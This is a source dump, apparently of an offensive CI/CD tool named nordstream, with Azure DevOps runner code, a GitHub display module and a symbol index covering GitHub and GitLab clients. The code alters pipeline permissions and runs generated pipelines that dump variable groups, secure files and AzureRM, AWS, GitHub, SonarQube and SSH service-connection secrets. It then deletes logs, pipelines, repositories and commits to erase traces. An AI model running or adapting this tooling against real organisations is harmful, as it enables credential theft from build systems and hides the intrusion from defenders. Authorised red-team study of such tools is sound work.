def __displayFailureReasons(self, projectId, runId):
logger.error("Workflow failure:")
for reason in self._cicd.getFailureReason(projectId, runId):
logger.error(f"{reason}")
def __extractVariableGroupsSecrets(self, projectId, pipelineId):
logger.verbose(f"Getting variable groups secrets")
try:
variableGroups = self._cicd.listProjectVariableGroupsSecrets(projectId)
except DevOpsError as e:
logger.error(e)
else:
if len(variableGroups) > 0:
for variableGroup in variableGroups:
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSecretExtraction(variableGroup, self._poolName, self._os)
logger.verbose(
f'Checking (and modifying) pipeline permissions for variable group: "{variableGroup["name"]}"'
)
if not self._cicd.authorizePipelineForResourceAccess(
projectId, pipelineId, variableGroup, "variablegroup"
):
continue
variableGroupName = variableGroup.get("name")
logger.info(f'Extracting secrets for variable group: "{variableGroupName}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
else:
logger.info("No variable groups found")
def __extractSecureFiles(self, projectId, pipelineId):
logger.verbose(f"Getting secure files")
try:
secureFiles = self._cicd.listProjectSecureFiles(projectId)
except DevOpsError as e:
logger.error(e)
else:
if secureFiles:
for secureFile in secureFiles:
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSecureFileExtraction(secureFile["name"], self._poolName)
logger.verbose(
f'Checking (and modifying) pipeline permissions for the secure file: "{secureFile["name"]}"'
)
if not self._cicd.authorizePipelineForResourceAccess(
projectId, pipelineId, secureFile, "securefile"
):
continue
logger.info(f'Extracting secure file: "{secureFile["name"]}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
date = time.strftime("%Y-%m-%d_%H-%M-%S")
safeSecureFilename = "".join(
[c for c in secureFile["name"] if c.isalpha() or c.isdigit() or c in (" ", ".")]
).strip()
self.__extractPipelineOutput(
projectId,
self._resType["doubleb64"],
f"pipeline_{date}_secure_file_{safeSecureFilename}",
)
logger.empty_line()
else:
logger.info("No secure files found")
def __extractGitHubSecrets(self, projectId, pipelineId, sc):
endpoint = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForGitHub(endpoint, self._poolName, self._os)
logger.info(f'Extracting secrets for GitHub: "{endpoint}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["github"])
logger.empty_line()
def __extractAzureRMSecrets(self, projectId, pipelineId, sc):
scheme = sc.get("authorization").get("scheme").lower()
if scheme == "serviceprincipal":
name = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForAzureRm(name, self._poolName, self._os)
logger.info(f'Extracting secrets for AzureRM: "{name}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["azurerm"])
logger.empty_line()
else:
logger.error(f"Unsupported scheme: {scheme}")
def __extractAWSSecrets(self, projectId, pipelineId, sc):
scheme = sc.get("authorization").get("scheme").lower()
if scheme == "usernamepassword":
name = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForAWS(name, self._poolName, self._os)
logger.info(f'Extracting secrets for AWS: "{name}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
else:
logger.error(f"Unsupported scheme: {scheme}")
def __extractSonarSecrets(self, projectId, pipelineId, sc):
endpoint = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSonar(endpoint, self._poolName, self._os)
logger.info(f'Extracting secrets for Sonar: "{endpoint}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
def __extractSSHSecrets(self, projectId, pipelineId, sc):
endpoint = sc.get("name")
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.generatePipelineForSSH(endpoint, self._poolName, self._os)
logger.info(f'Extracting secrets for ssh: "{endpoint}"')
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId, self._resType["doubleb64"])
logger.empty_line()
def __extractServiceConnectionsSecrets(self, projectId, pipelineId):
try:
serviceConnections = self._cicd.listServiceConnections(projectId)
except DevOpsError as e:
logger.error(e)
else:
for sc in serviceConnections:
scType = sc.get("type").lower()
if scType in self._allowedTypes:
logger.verbose(
f'Checking (and modifying) pipeline permissions for the service connection: "{sc["name"]}"'
)
if not self._cicd.authorizePipelineForResourceAccess(projectId, pipelineId, sc, "endpoint"):
continue
if self._extractAzureServiceconnections and scType == "azurerm":
self.__extractAzureRMSecrets(projectId, pipelineId, sc)
elif self._extractGitHubServiceconnections and scType == "github":
self.__extractGitHubSecrets(projectId, pipelineId, sc)
elif self._extractAWSServiceconnections and scType == "aws":
self.__extractAWSSecrets(projectId, pipelineId, sc)
elif self._extractSonarServiceconnections and scType == "sonarqube":
self.__extractSonarSecrets(projectId, pipelineId, sc)
elif self._extractSSHServiceConnections and scType == "ssh":
self.__extractSSHSecrets(projectId, pipelineId, sc)
def manualCleanLogs(self):
logger.info("Deleting logs")
for project in self._cicd.projects:
projectId = project.get("id")
logger.info(f"Cleaning logs for project: {projectId}")
self._cicd.cleanAllLogs(projectId)
def __runSecretsExtractionPipeline(self, projectId, pipelineId):
if self._extractVariableGroups:
self.__extractVariableGroupsSecrets(projectId, pipelineId)
if self._extractSecureFiles:
self.__extractSecureFiles(projectId, pipelineId)
if (
self._extractAzureServiceconnections
or self._extractGitHubServiceconnections
or self._extractAWSServiceconnections
or self._extractSonarServiceconnections
or self._extractSSHServiceConnections
):
self.__extractServiceConnectionsSecrets(projectId, pipelineId)
def __pushEmptyFile(self):
Git.gitCreateDummyFile("README.md")
diffOutput = Git.gitDiffFile("README.md")
stdout, stderr = diffOutput.communicate()
if stdout == b"":
logger.verbose(f"README.md file not modified.")
else:
logger.verbose(f"README.md file is modified, incrementing commit count.")
self._pushedCommitsCount += 1
pushOutput = Git.gitPush(self._cicd.branchName)
pushOutput.wait()
try:
if pushOutput.returncode != 0:
logger.error("Error when pushing code:")
logger.raw(pushOutput.communicate()[1], logging.INFO)
else:
logger.raw(pushOutput.communicate()[1])
except Exception as e:
logger.exception(e)
def __createRemoteRepo(self, projectId):
repo = self._cicd.createGit(projectId)
if repo.get("id"):
repoId = repo.get("id")
logger.info(f'New remote repository created: "{self._cicd.repoName}" / "{repoId}"')
return repo
else:
return None
def __getRemoteRepo(self, projectId):
for repo in self._cicd.listRepositories(projectId):
if self._cicd.repoName == repo.get("name"):
return repo, False
repo = self.__createRemoteRepo(projectId)
if repo != None:
return repo, True
raise RepoCreationError("No repo found")
def __deleteRemoteBranch(self):
logger.verbose("Deleting remote branch")
deleteOutput = Git.gitDeleteRemote(self._cicd.branchName)
deleteOutput.wait()
if deleteOutput.returncode != 0:
logger.error(f"Error deleting remote branch {self._cicd.branchName}")
logger.raw(deleteOutput.communicate()[1], logging.INFO)
return False
return True
def __clean(self, projectId, repoId, deleteRemoteRepo, deleteRemotePipeline):
if self._cleanLogs:
if deleteRemotePipeline:
logger.verbose("Deleting remote pipeline.")
self._cicd.deletePipeline(projectId)
if deleteRemoteRepo:
logger.verbose("Deleting remote repository.")
self._cicd.deleteGit(projectId, repoId)
else:
if self._pushedCommitsCount > 0:
if self._cleanLogs:
logger.info(f"Cleaning logs for project: {projectId}")
self._cicd.cleanAllLogs(projectId)
logger.verbose("Cleaning commits.")
if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName:
Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount)
else:
if not self.__deleteRemoteBranch():
logger.info("Cleaning remote branch.")
# remove everything if we can't delete the branch (leave one file, otherwise it would try to remove the branch itself)
Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True)
def __createPipeline(self, projectId, repoId):
logger.info("Getting pipeline")
self.__pushEmptyFile()
for pipeline in self._cicd.listPipelines(projectId):
if pipeline.get("name") == self._cicd.pipelineName:
return pipeline.get("id"), False
pipelineId = self._cicd.createPipeline(projectId, repoId, f"{self._pipelineFilename}")
if pipelineId:
return pipelineId, True
else:
raise Exception("unable to create a pipeline")
def __runCustomPipeline(self, projectId, pipelineId):
pipelineGenerator = DevOpsPipelineGenerator()
pipelineGenerator.loadFile(self._yaml)
logger.info("Running arbitrary pipeline")
runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
if runId:
self._fileName = self._cicd.downloadPipelineOutput(projectId, runId)
if self._fileName:
self.__extractPipelineOutput(projectId)
logger.empty_line()
def runPipeline(self):
for project in self._cicd.projects:
projectId = project.get("id")
repoId = None
deleteRemoteRepo = False
deleteRemotePipeline = False
# skip if no secrets
if not self._yaml:
if not self.__checkSecrets(project):
continue
try:
# Create or get first repo of the project
repo, deleteRemoteRepo = self.__getRemoteRepo(projectId)
repoId = repo.get("id")
self._cicd.repoName = repo.get("name")
logger.info(f'Getting remote repository: "{self._cicd.repoName}" /' f' "{repoId}"')
url = f"https://foo:{self._cicd.token}@dev.azure.com/{self._cicd.org}/{projectId}/_git/{self._cicd.repoName}"
if not Git.gitClone(url):
raise GitError("Fail to clone the repository")
chdir(self._cicd.repoName)
self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName)
Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists)
pipelineId, deleteRemotePipeline = self.__createPipeline(projectId, repoId)
if self._yaml:
self.__runCustomPipeline(projectId, pipelineId)
else:
self.__runSecretsExtractionPipeline(projectId, pipelineId)
except (GitError, RepoCreationError) as e:
name = project.get("name")
logger.error(f"Error in project {name}: {e}")
except KeyboardInterrupt:
self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline)
chdir("../")
subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait()
except Exception as e:
logger.error(f"Error during pipeline run: {e}")
if logger.getEffectiveLevel() == logging.DEBUG:
logger.exception(e)
self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline)
chdir("../")
subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait()
else:
self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline)
chdir("../")
subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait()
def describeToken(self):
response = self._cicd.getUser()
logger.info("Token information:")
username = response.get("authenticatedUser").get("properties").get("Account").get("$value")
if username != "":
logger.raw(f"\t- Username: {username}\n", logging.INFO)
id = response.get("authenticatedUser").get("id")
if id != "":
logger.raw(f"\t- Id: {id}\n", logging.INFO)
def __checkRunErrors(self, run):
if run.get("customProperties") != None:
validationResults = run.get("customProperties").get("ValidationResults", [])
msg = ""
for res in validationResults:
if res.get("result", "") == "error":
if "Verify the name and credentials being used" in res.get("message", ""):
raise DevOpsError("The stored token is not valid anymore.")
msg += res.get("message", "") + "\n"
raise DevOpsError(msg)
def parseExtractList(self, extractList, allow=True):
extractList = extractList.split(",") if extractList else []
self._extractVariableGroups = isAllowed("vg", extractList, allow)
self._extractSecureFiles = isAllowed("sf", extractList, allow)
self._extractAzureServiceconnections = isAllowed("az", extractList, allow)
self._extractGitHubServiceconnections = isAllowed("gh", extractList, allow)
self._extractAWSServiceconnections = isAllowed("aws", extractList, allow)
self._extractSonarServiceconnections = isAllowed("sonar", extractList, allow)
self._extractSSHServiceConnections = isAllowed("ssh", extractList, allow)
================================================
FILE: nordstream/core/github/display.py
================================================
from nordstream.utils.log import logger
import logging
from nordstream.core.github.protections import getUsersArray, getTeamsOrAppsArray
def displayRepoSecrets(secrets):
if len(secrets) != 0:
logger.info("Repo secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayDependabotRepoSecrets(secrets):
if len(secrets) != 0:
logger.info("Dependabot repo secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayEnvSecrets(env, secrets):
if len(secrets) != 0:
logger.info(f"{env} secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayOrgSecrets(secrets):
if len(secrets) != 0:
logger.info("Repository organization secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayDependabotOrgSecrets(secrets):
if len(secrets) != 0:
logger.info("Dependabot organization secrets:")
for secret in secrets:
logger.raw(f"\t- {secret}\n", logging.INFO)
def displayEnvSecurity(envDetails):
protectionRules = envDetails.get("protection_rules")
envName = envDetails.get("name")
if len(protectionRules) > 0:
logger.info(f'Environment protection for: "{envName}":')
for protection in protectionRules:
if protection.get("type") == "required_reviewers":
for reviewer in protection.get("reviewers"):
reviewerType = reviewer.get("type")
login = reviewer.get("reviewer").get("login")
userId = reviewer.get("reviewer").get("id")
logger.raw(
f"\t- reviewer ({reviewerType}): {login}/{userId}\n",
logging.INFO,
)
elif protection.get("type") == "wait_timer":
wait = protection.get("wait_timer")
logger.raw(f"\t- timer: {wait} min\n", logging.INFO)
else:
branchPolicy = envDetails.get("deployment_branch_policy")
if branchPolicy.get("custom_branch_policies", False):
logger.raw(f"\t- deployment branch policy: custom\n", logging.INFO)
else:
logger.raw(f"\t- deployment branch policy: protected\n", logging.INFO)
else:
logger.info(f'No environment protection rule found for: "{envName}"')
def displayBranchProtectionRules(protections):
logger.info("Branch protections:")
logger.raw(
f'\t- enforce admins: {protections.get("enforce_admins").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- block creations:" f' {protections.get("block_creations").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- required signatures:" f' {protections.get("required_signatures").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- allow force pushes:" f' {protections.get("allow_force_pushes").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- allow deletions:" f' {protections.get("allow_deletions").get("enabled")}\n',
logging.INFO,
)
if protections.get("restrictions"):
displayRestrictions(protections.get("restrictions"))
if protections.get("required_pull_request_reviews"):
displayRequiredPullRequestReviews(protections.get("required_pull_request_reviews"))
else:
logger.raw(f"\t- required pull request reviews: False\n", logging.INFO)
if protections.get("required_status_checks"):
displayRequiredStatusChecks(protections.get("required_status_checks"))
logger.raw(
"\t- required linear history:" f' {protections.get("required_linear_history").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- required conversation resolution:"
f' {protections.get("required_conversation_resolution").get("enabled")}\n',
logging.INFO,
)
logger.raw(
f'\t- lock branch: {protections.get("lock_branch").get("enabled")}\n',
logging.INFO,
)
logger.raw(
"\t- allow fork syncing:" f' {protections.get("allow_fork_syncing").get("enabled")}\n',
logging.INFO,
)
def displayRequiredStatusChecks(data):
logger.raw(f"\t- required status checks:\n", logging.INFO)
logger.raw(f'\t - strict: {data.get("strict")}\n', logging.INFO)
if len(data.get("contexts")) != 0:
logger.raw(f'\t - contexts: {data.get("contexts")}\n', logging.INFO)
if len(data.get("checks")) != 0:
logger.raw(f'\t - checks: {data.get("checks")}\n', logging.INFO)
def displayRequiredPullRequestReviews(data):
logger.raw(f"\t- pull request reviews:\n", logging.INFO)
logger.raw(f'\t - approving review count: {data.get("required_approving_review_count")}\n', logging.INFO)
logger.raw(f'\t - require code owner reviews: {data.get("require_code_owner_reviews")}\n', logging.INFO)
logger.raw(f'\t - require last push approval: {data.get("require_last_push_approval")}\n', logging.INFO)
logger.raw(f'\t - dismiss stale reviews: {data.get("dismiss_stale_reviews")}\n', logging.INFO)
if data.get("dismissal_restrictions"):
users = getUsersArray(data.get("dismissal_restrictions").get("users"))
teams = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("teams"))
apps = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("apps"))
if len(users) != 0 or len(teams) != 0 or len(apps) != 0:
logger.raw(f"\t - dismissal_restrictions:\n", logging.INFO)
if len(users) != 0:
logger.raw(f"\t - users: {users}\n", logging.INFO)
if len(teams) != 0:
logger.raw(f"\t - teams: {teams}\n", logging.INFO)
if len(apps) != 0:
logger.raw(f"\t - apps: {apps}\n", logging.INFO)
if data.get("bypass_pull_request_allowances"):
users = getUsersArray(data.get("bypass_pull_request_allowances").get("users"))
teams = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("teams"))
apps = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("apps"))
if len(users) != 0 or len(teams) != 0 or len(apps) != 0:
logger.raw(f"\t - bypass pull request allowances:\n", logging.INFO)
if len(users) != 0:
logger.raw(f"\t - users: {users}\n", logging.INFO)
if len(teams) != 0:
logger.raw(f"\t - teams: {teams}\n", logging.INFO)
if len(apps) != 0:
logger.raw(f"\t - apps: {apps}\n", logging.INFO)
def displayRestrictions(data):
users = getUsersArray(data.get("users"))
teams = getTeamsOrAppsArray(data.get("teams"))
apps = getTeamsOrAppsArray(data.get("apps"))
if len(users) != 0 or len(teams) != 0 or len(apps) != 0:
logger.raw(f"\t- person allowed to push to restrict
================================================
SYMBOL INDEX (422 symbols across 22 files)
================================================
FILE: nordstream/__main__.py
function main (line 24) | def main():
FILE: nordstream/cicd/devops.py
class DevOps (line 15) | class DevOps:
method __init__ (line 37) | def __init__(self, token, org, verifCert):
method projects (line 47) | def projects(self):
method org (line 51) | def org(self):
method branchName (line 55) | def branchName(self):
method branchName (line 59) | def branchName(self, value):
method repoName (line 63) | def repoName(self):
method repoName (line 67) | def repoName(self, value):
method pipelineName (line 71) | def pipelineName(self):
method pipelineName (line 75) | def pipelineName(self, value):
method defaultAgentPool (line 79) | def defaultAgentPool(self):
method defaultAgentPool (line 83) | def defaultAgentPool(self, value):
method sleepTime (line 87) | def sleepTime(self):
method sleepTime (line 91) | def sleepTime(self, value):
method token (line 95) | def token(self):
method outputDir (line 99) | def outputDir(self):
method outputDir (line 103) | def outputDir(self, value):
method defaultPipelineName (line 107) | def defaultPipelineName(self):
method defaultBranchName (line 111) | def defaultBranchName(self):
method __getLogin (line 114) | def __getLogin(self):
method getUser (line 117) | def getUser(self):
method setCookiesAndHeaders (line 123) | def setCookiesAndHeaders(self):
method listProjects (line 130) | def listProjects(self):
method listUsers (line 149) | def listUsers(self):
method filterWriteProjects (line 182) | def filterWriteProjects(self):
method __checkProjectPrivs (line 218) | def __checkProjectPrivs(self, login, projectName, group):
method listRepositories (line 249) | def listRepositories(self, project):
method listPipelines (line 256) | def listPipelines(self, project):
method addProject (line 263) | def addProject(self, project):
method checkToken (line 275) | def checkToken(cls, token, org, verifCert):
method listProjectVariableGroupsSecrets (line 291) | def listProjectVariableGroupsSecrets(self, project):
method listProjectSecureFiles (line 314) | def listProjectSecureFiles(self, project):
method authorizePipelineForResourceAccess (line 332) | def authorizePipelineForResourceAccess(self, projectId, pipelineId, re...
method createGit (line 359) | def createGit(self, project):
method deleteGit (line 369) | def deleteGit(self, project, repoId):
method createPipeline (line 376) | def createPipeline(self, project, repoId, path):
method runPipeline (line 433) | def runPipeline(self, project, pipelineId):
method __getBuilds (line 447) | def __getBuilds(self, project):
method __getBuildSources (line 458) | def __getBuildSources(self, project, buildId):
method getRunId (line 464) | def getRunId(self, project, pipelineId):
method waitPipeline (line 492) | def waitPipeline(self, project, pipelineId, runId):
method __createPipelineOutputDir (line 513) | def __createPipelineOutputDir(self, projectName):
method downloadPipelineOutput (line 516) | def downloadPipelineOutput(self, projectId, runId):
method __cleanRunLogs (line 575) | def __cleanRunLogs(self, projectId):
method __cleanPipeline (line 596) | def __cleanPipeline(self, projectId):
method deletePipeline (line 610) | def deletePipeline(self, projectId):
method cleanAllLogs (line 625) | def cleanAllLogs(self, projectId):
method listServiceConnections (line 628) | def listServiceConnections(self, projectId):
method getFailureReason (line 645) | def getFailureReason(self, projectId, runId):
method getOrgs (line 667) | def getOrgs(cls, token):
FILE: nordstream/cicd/github.py
class GitHub (line 11) | class GitHub:
method __init__ (line 30) | def __init__(self, token):
method checkToken (line 40) | def checkToken(token):
method token (line 51) | def token(self):
method org (line 55) | def org(self):
method org (line 59) | def org(self, org):
method defaultBranchName (line 63) | def defaultBranchName(self):
method branchName (line 67) | def branchName(self):
method branchName (line 71) | def branchName(self, value):
method repos (line 75) | def repos(self):
method outputDir (line 79) | def outputDir(self):
method outputDir (line 83) | def outputDir(self, value):
method __getLogin (line 86) | def __getLogin(self):
method getUser (line 89) | def getUser(self):
method getLoginWithGraphQL (line 93) | def getLoginWithGraphQL(self):
method __paginatedGet (line 103) | def __paginatedGet(self, url, data="", maxData=0):
method listRepos (line 141) | def listRepos(self):
method addRepo (line 159) | def addRepo(self, repo):
method listEnvFromrepo (line 184) | def listEnvFromrepo(self, repo):
method listSecretsFromEnv (line 193) | def listSecretsFromEnv(self, repo, env):
method listSecretsFromRepo (line 205) | def listSecretsFromRepo(self, repo):
method listOrganizationSecretsFromRepo (line 215) | def listOrganizationSecretsFromRepo(self, repo):
method listDependabotSecretsFromRepo (line 225) | def listDependabotSecretsFromRepo(self, repo):
method listDependabotOrganizationSecrets (line 235) | def listDependabotOrganizationSecrets(self):
method listEnvProtections (line 245) | def listEnvProtections(self, repo, env):
method getEnvDetails (line 261) | def getEnvDetails(self, repo, env):
method createDeploymentBranchPolicy (line 273) | def createDeploymentBranchPolicy(self, repo, env):
method deleteDeploymentBranchPolicy (line 292) | def deleteDeploymentBranchPolicy(self, repo, env):
method disableBranchProtectionRules (line 318) | def disableBranchProtectionRules(self, repo):
method modifyEnvProtectionRules (line 342) | def modifyEnvProtectionRules(self, repo, env, wait, reviewers, branchP...
method deleteDeploymentBranchPolicyForAllEnv (line 360) | def deleteDeploymentBranchPolicyForAllEnv(self, repo):
method checkBranchProtectionRules (line 365) | def checkBranchProtectionRules(self, repo):
method getBranchesProtectionRules (line 375) | def getBranchesProtectionRules(self, repo):
method updateBranchesProtectionRules (line 386) | def updateBranchesProtectionRules(self, repo, protections):
method cleanDeploymentsLogs (line 398) | def cleanDeploymentsLogs(self, repo):
method cleanRunLogs (line 435) | def cleanRunLogs(self, repo, workflowFilename):
method cleanAllLogs (line 514) | def cleanAllLogs(self, repo, workflowFilename):
method createWorkflowOutputDir (line 519) | def createWorkflowOutputDir(self, repo):
method waitWorkflow (line 523) | def waitWorkflow(self, repo, workflowFilename):
method downloadWorkflowOutput (line 568) | def downloadWorkflowOutput(self, repo, name, workflowId):
method getFailureReason (line 583) | def getFailureReason(self, repo, workflowId):
method filterWriteRepos (line 609) | def filterWriteRepos(self):
method isGHSToken (line 619) | def isGHSToken(self):
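The GitHub client above covers repository enumeration, secret listing at every scope (repository, environment, organization, Dependabot), branch- and environment-protection management, and workflow run tracking, artifact download and log cleanup. A hypothetical sketch built only from the signatures shown; return types and iteration behavior are assumptions.

from nordstream.cicd.github import GitHub


def enumerate_repo_secret_names(token, repo):
    """Hypothetical enumeration flow; GitHub.checkToken(token) could be called first."""
    gh = GitHub(token)                        # __init__(self, token) per the index
    gh.listSecretsFromRepo(repo)              # repository-level Actions secrets
    gh.listOrganizationSecretsFromRepo(repo)  # organization secrets visible to the repo
    gh.listDependabotSecretsFromRepo(repo)    # Dependabot secrets
    # listEnvFromrepo (lowercase 'r' is the real identifier) is assumed to return
    # an iterable of environment names.
    for env in gh.listEnvFromrepo(repo):
        gh.listSecretsFromEnv(repo, env)      # environment-scoped secrets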
FILE: nordstream/cicd/gitlab.py
class GitLab (line 16) | class GitLab:
method __init__ (line 33) | def __init__(self, url, token, verifCert):
method projects (line 42) | def projects(self):
method groups (line 46) | def groups(self):
method token (line 50) | def token(self):
method url (line 54) | def url(self):
method outputDir (line 58) | def outputDir(self):
method outputDir (line 62) | def outputDir(self, value):
method defaultBranchName (line 66) | def defaultBranchName(self):
method branchName (line 70) | def branchName(self):
method branchName (line 74) | def branchName(self, value):
method checkToken (line 78) | def checkToken(cls, token, gitlabURL, verifyCert):
method __getLogin (line 104) | def __getLogin(self):
method getUser (line 108) | def getUser(self):
method setCookiesAndHeaders (line 113) | def setCookiesAndHeaders(self):
method __paginatedGet (line 121) | def __paginatedGet(self, url, params={}):
method listRunnersFromProject (line 147) | def listRunnersFromProject(self, project):
method listVariablesFromProject (line 193) | def listVariablesFromProject(self, project):
method listInheritedVariablesFromProject (line 222) | def listInheritedVariablesFromProject(self, project):
method listSecureFilesFromProject (line 282) | def listSecureFilesFromProject(self, project):
method listVariablesFromGroup (line 319) | def listVariablesFromGroup(self, group):
method listVariablesFromInstance (line 348) | def listVariablesFromInstance(self):
method addProjects (line 375) | def addProjects(self, project=None, filterWrite=False, strict=False, m...
method addGroups (line 414) | def addGroups(self, group=None):
method listUsers (line 439) | def listUsers(self):
method __createOutputDir (line 463) | def __createOutputDir(self, name):
method waitPipeline (line 469) | def waitPipeline(self, projectId):
method __getJobs (line 497) | def __getJobs(self, projectId, pipelineId):
method downloadPipelineOutput (line 509) | def downloadPipelineOutput(self, project, pipelineId):
method __getTraceForJobId (line 540) | def __getTraceForJobId(self, projectId, jobId):
method __deletePipeline (line 557) | def __deletePipeline(self, projectId):
method cleanAllLogs (line 602) | def cleanAllLogs(self, projectId):
method __cleanEvents (line 607) | def __cleanEvents(self, projectId):
method getBranchesProtectionRules (line 631) | def getBranchesProtectionRules(self, projectId):
method getBranches (line 641) | def getBranches(self, projectId):
method getProject (line 663) | def getProject(self, projectId):
method getFailureReasonPipeline (line 673) | def getFailureReasonPipeline(self, projectId, pipelineId):
method getFailureReasonJobs (line 679) | def getFailureReasonJobs(self, projectId, pipelineId):
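The GitLab client exposes the same idea for GitLab CI: CI/CD variables at project, group and instance level, secure files, runners, pipeline traces and branch protections; the setCookiesAndHeaders method together with isGitLabSessionCookie in utils/helpers.py suggests a session cookie can stand in for a token. A hypothetical sketch using only the indexed names and parameters; behavior beyond that is assumed.

from nordstream.cicd.gitlab import GitLab


def enumerate_gitlab_secret_surface(url, token):
    """Hypothetical enumeration flow; return shapes are not asserted."""
    gl = GitLab(url, token, True)            # __init__(self, url, token, verifCert)
    gl.addProjects()                         # assumed to populate the `projects` property
    for project in gl.projects:
        gl.listVariablesFromProject(project)
        gl.listSecureFilesFromProject(project)
        gl.listRunnersFromProject(project)
    gl.listVariablesFromInstance()           # instance-level CI/CD variables


# GitLab.checkToken(token, gitlabURL, verifyCert) is also available as a classmethod
# for validating credentials up front; its return value is not asserted here.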
FILE: nordstream/commands/devops.py
function start (line 75) | def start(argv):
FILE: nordstream/commands/github.py
function start (line 73) | def start(argv):
FILE: nordstream/commands/gitlab.py
function start (line 65) | def start(argv):
FILE: nordstream/core/devops/devops.py
class DevOpsRunner (line 15) | class DevOpsRunner:
method __init__ (line 36) | def __init__(self, cicd):
method extractVariableGroups (line 41) | def extractVariableGroups(self):
method extractVariableGroups (line 45) | def extractVariableGroups(self, value):
method extractSecureFiles (line 49) | def extractSecureFiles(self):
method extractSecureFiles (line 53) | def extractSecureFiles(self, value):
method extractAzureServiceconnections (line 57) | def extractAzureServiceconnections(self):
method extractAzureServiceconnections (line 61) | def extractAzureServiceconnections(self, value):
method extractGitHubServiceconnections (line 65) | def extractGitHubServiceconnections(self):
method extractGitHubServiceconnections (line 69) | def extractGitHubServiceconnections(self, value):
method extractAWSServiceconnections (line 73) | def extractAWSServiceconnections(self):
method extractAWSServiceconnections (line 77) | def extractAWSServiceconnections(self, value):
method extractSonarerviceconnections (line 81) | def extractSonarerviceconnections(self):
method extractSonarerviceconnections (line 85) | def extractSonarerviceconnections(self, value):
method extractSSHServiceConnections (line 89) | def extractSSHServiceConnections(self):
method extractSSHServiceConnections (line 93) | def extractSSHServiceConnections(self, value):
method output (line 97) | def output(self):
method output (line 101) | def output(self, value):
method cleanLogs (line 105) | def cleanLogs(self):
method cleanLogs (line 109) | def cleanLogs(self, value):
method yaml (line 113) | def yaml(self):
method yaml (line 117) | def yaml(self, value):
method pipelineFilename (line 121) | def pipelineFilename(self):
method pipelineFilename (line 125) | def pipelineFilename(self, value):
method writeAccessFilter (line 129) | def writeAccessFilter(self):
method writeAccessFilter (line 133) | def writeAccessFilter(self, value):
method poolName (line 137) | def poolName(self):
method poolName (line 141) | def poolName(self, value):
method os (line 145) | def os(self):
method os (line 149) | def os(self, value):
method __createLogDir (line 152) | def __createLogDir(self):
method listDevOpsProjects (line 156) | def listDevOpsProjects(self):
method listDevOpsRepositories (line 162) | def listDevOpsRepositories(self):
method listDevOpsUsers (line 170) | def listDevOpsUsers(self):
method getProjects (line 184) | def getProjects(self, project):
method listProjectSecrets (line 205) | def listProjectSecrets(self):
method __displayProjectVariableGroupsSecrets (line 216) | def __displayProjectVariableGroupsSecrets(self, project):
method __displayProjectSecureFiles (line 230) | def __displayProjectSecureFiles(self, project):
method __displayServiceConnections (line 241) | def __displayServiceConnections(self, projectId):
method __checkSecrets (line 255) | def __checkSecrets(self, project):
method createYaml (line 292) | def createYaml(self, pipelineType):
method __extractPipelineOutput (line 311) | def __extractPipelineOutput(self, projectId, resType=0, resultsFilenam...
method __extractGitHubResults (line 338) | def __extractGitHubResults(output):
method __doubleb64 (line 349) | def __doubleb64(output):
method __azureRm (line 355) | def __azureRm(output):
